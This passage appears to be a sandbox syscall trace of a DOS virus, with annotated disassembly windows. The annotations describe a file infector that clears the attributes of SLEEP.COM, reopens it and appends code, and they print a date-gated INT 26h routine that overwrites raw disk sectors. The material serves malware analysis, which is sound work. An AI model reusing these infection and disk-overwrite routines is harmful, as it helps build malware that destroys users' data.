2018-12-25T12:45:17.560902766Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:17.562684999Z 62 PC: 12d11 | Close file
2018-12-25T12:45:17.571759029Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:17.593503559Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:17.596328919Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:17.60451862Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:17.61107903Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:17.613518935Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:17.624523242Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:17.626876942Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:17.633662424Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:17.636872299Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:17.640133394Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:17.643029641Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:17.644698125Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.647693239Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:17.656380762Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.658825586Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:17.661554831Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:17.669573859Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:17.679173948Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:17.682772369Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:17.689455234Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:17.696054528Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:17.699089021Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:17.708950487Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:17.711015847Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:17.718576151Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:17.721685716Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:17.724492655Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:17.727972837Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:17.730553397Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.733262365Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:17.742787588Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.745190861Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:17.746911966Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:17.754713776Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:17.764955249Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
; Window after the "Get date" call at PC 12b6f; its first instruction (cmp dx, 0x606) is on the trace row above.
; DOS returns the month in DH and the day in DL, so 0x0606 is 6 June; the run configurations on this page use 1 January.
; From 0x12b7b the linear sweep runs through bytes that are probably data, so those mnemonics are unreliable.
0x12b73: je 0x12b78  ; date matches: take the 0x12d28 path
0x12b75: jmp 0x12d94  ; otherwise continue at 0x12d94; the trace next logs calls at PC 12d9f and 12da6
0x12b78: jmp 0x12d28  ; date-triggered path, outside this window
0x12b7b: and ah, bh  ; not reachable by fall-through (follows an unconditional jmp); presumably data
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; 55 then 8B EC would be push bp / mov bp, sp from 0x12b84, so the sweep looks misaligned
0x12b86: in al, dx  ; opcode EC, likely the tail of mov bp, sp rather than a port read
0x12b87: sub sp, 0x2c  ; reserve 0x2c bytes of stack
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; INT 21h AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DS:DX = bp - 0x2c, presumably the stack buffer reserved above
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; INT 21h AH=4Eh: find first
0x12b97: mov cx, 0x10  ; attribute mask 0x10 (directory bit)
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at offset 0x1b8; the window ends before the int
2018-12-25T12:45:17.767011985Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:17.771040096Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:16.836476777Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
; Window of 16-bit DOS code after the "Get date" call at PC 12a5a; its first instruction (cmp dl, 2) is on the trace row above.
; DOS returns the day of the month in DL, so the int 0x26 path below is gated on day 2; the run configurations on this page set Day to 1.
; NOTE(review): the syscall numbers in this trace match INT 21h AH values, so an int 0x26 may not be logged at all - confirm before reading its absence as "not executed".
0x12a5d: je 0x12a62  ; DL == 2: fall into the raw disk-write path
0x12a5f: jmp 0x12a80  ; any other day: straight to the ret
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq  ; cdq and cwd share one opcode; in 16-bit code it executes as cwd (DX = sign extension of AX)
0x12a66: mov cx, 0x100  ; CX = 0x100, the sector count for int 0x26
0x12a69: int 0x26  ; DOS absolute disk write: raw sectors, bypassing the file system (AL = drive, DX = first sector, DS:BX = buffer)
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3  ; AL = 3
0x12a71: mov cx, 0x2bc  ; CX = 0x2bc
0x12a74: mov dx, 0  ; DX = 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62  ; 0x22a62 - 0x12a80 = 0xffe2, i.e. -0x1e as a signed 16-bit displacement: the real target is presumably 0x12a62 (the int 0x26 path)
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]  ; past the ret; the window ends here
2018-12-25T12:45:16.839423734Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:16.842225761Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:16.846265524Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:16.848990078Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:16.854885441Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:16.861230823Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:16.868354563Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
; Window of 16-bit DOS code after the "Get time" call; its first instruction (add dl, dh) is on the trace row above.
; Read with the trace: clear the target's attributes, close it, reopen it read/write, then begin writing.
; Analyst note: an attribute reset followed by a read/write reopen of an existing .COM file is a behavioural indicator of a file infector.
0x12c90: je 0x12c8a  ; DL + DH was zero: branch back (target is before this window), presumably to read the clock again
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]  ; si = 0x115 + word stored at 0x106 (looks like a relocation delta; TODO confirm)
0x12c99: mov byte ptr [si], dl  ; store the time-derived byte; NOTE(review): possibly a per-copy key, its use is not shown here
0x12c9b: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx  ; CX = 0: no attributes, so read-only/hidden/system are cleared
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca  ; DS:DX = si + 0xca, the path argument of the attribute call
0x12ca6: int 0x21  ; logged in the trace as "Get or set file attributes" (PC 12ca8)
0x12ca8: mov ah, 0x3e  ; INT 21h AH=3Eh: close the handle in BX
0x12caa: int 0x21  ; logged as "Close file" (PC 12cac)
0x12cac: mov ax, 0x3d02  ; INT 21h AH=3Dh, AL=02h: open for read/write
0x12caf: int 0x21  ; logged as "Open file" (PC 12cb1)
0x12cb1: jb 0x12c63  ; carry set means the open failed; the error path is outside this window
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax  ; save the new handle at es:[dx + 0x63]
0x12cb9: xchg ax, bx  ; handle into BX for the handle-based calls that follow
0x12cba: mov ah, 0x40  ; INT 21h AH=40h: write; the window ends before the int, the trace logs the write at PC 12cc4
2018-12-25T12:45:16.870843912Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:17.51258807Z 62 PC: 12cac | Close file
2018-12-25T12:45:17.516657844Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:17.524968836Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:17.53219852Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:17.535405345Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:17.53970767Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:17.541963097Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.544683294Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:17.555236623Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.557824446Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:17.55977512Z 62 PC: 12d11 | Close file
2018-12-25T12:45:17.575082591Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:17.587109671Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:17.590058687Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:17.600749572Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:17.612709391Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:17.615581666Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:17.625891969Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:17.628140577Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:17.635105784Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:17.638432407Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:17.650272064Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:17.653821564Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:17.65619356Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.659135418Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:17.667591663Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.66972539Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:17.671938771Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:17.679436943Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:17.689066647Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:17.692669543Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:17.698999238Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:17.705182473Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:17.708239674Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:17.71809548Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:17.719810147Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:17.728075365Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:17.730926155Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:17.7335303Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:17.737013344Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:17.738393346Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.740418787Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:17.749449542Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.751766099Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:17.753265464Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:17.761652122Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:17.77204026Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
; Window after the "Get date" call at PC 12b6f; its first instruction (cmp dx, 0x606) is on the trace row above.
; DOS returns the month in DH and the day in DL, so 0x0606 is 6 June; the run configurations on this page use 1 January.
; From 0x12b7b the linear sweep runs through bytes that are probably data, so those mnemonics are unreliable.
0x12b73: je 0x12b78  ; date matches: take the 0x12d28 path
0x12b75: jmp 0x12d94  ; otherwise continue at 0x12d94; the trace next logs calls at PC 12d9f and 12da6
0x12b78: jmp 0x12d28  ; date-triggered path, outside this window
0x12b7b: and ah, bh  ; not reachable by fall-through (follows an unconditional jmp); presumably data
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl  ; NOTE(review): encodes as 00 55 8B; 55 then 8B EC would be push bp / mov bp, sp from 0x12b84, so the sweep looks misaligned
0x12b86: in al, dx  ; opcode EC, likely the tail of mov bp, sp rather than a port read
0x12b87: sub sp, 0x2c  ; reserve 0x2c bytes of stack
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a  ; INT 21h AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]  ; DS:DX = bp - 0x2c, presumably the stack buffer reserved above
0x12b93: int 0x21
0x12b95: mov ah, 0x4e  ; INT 21h AH=4Eh: find first
0x12b97: mov cx, 0x10  ; attribute mask 0x10 (directory bit)
0x12b9a: mov dx, 0x1b8  ; DS:DX = search pattern at offset 0x1b8; the window ends before the int
2018-12-25T12:45:17.774495786Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:17.778940755Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:16.995745764Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:16.998557512Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:17.001275452Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:17.005011711Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:17.006588016Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:17.016930204Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:17.02780382Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:17.034581875Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:17.03662112Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:17.513136259Z 62 PC: 12cac | Close file
2018-12-25T12:45:17.516264283Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:17.5227226Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:17.525680339Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:17.528497167Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:17.531668075Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:17.533270379Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.535630289Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:17.545183219Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.547567294Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:17.549315008Z 62 PC: 12d11 | Close file
2018-12-25T12:45:17.562400514Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:17.572092628Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:17.574586121Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:17.581467254Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:17.588001855Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:17.590375013Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:17.604948042Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:17.60705104Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:17.613812842Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:17.617647825Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:17.620536384Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:17.624158548Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:17.626693934Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.629352191Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:17.638744025Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.641692043Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:17.64567169Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:17.653473544Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:17.663463302Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:17.667449501Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:17.674105443Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:17.680553331Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:17.684327239Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:17.694583154Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:17.69652392Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:17.703731696Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:17.706674485Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:17.709410026Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:17.712708493Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:17.714369652Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.716664305Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:17.725831067Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:17.728267509Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:17.729760656Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:17.737480653Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:17.748622758Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:17.75066032Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:17.754657755Z 59 PC: 12da6 | Change current directory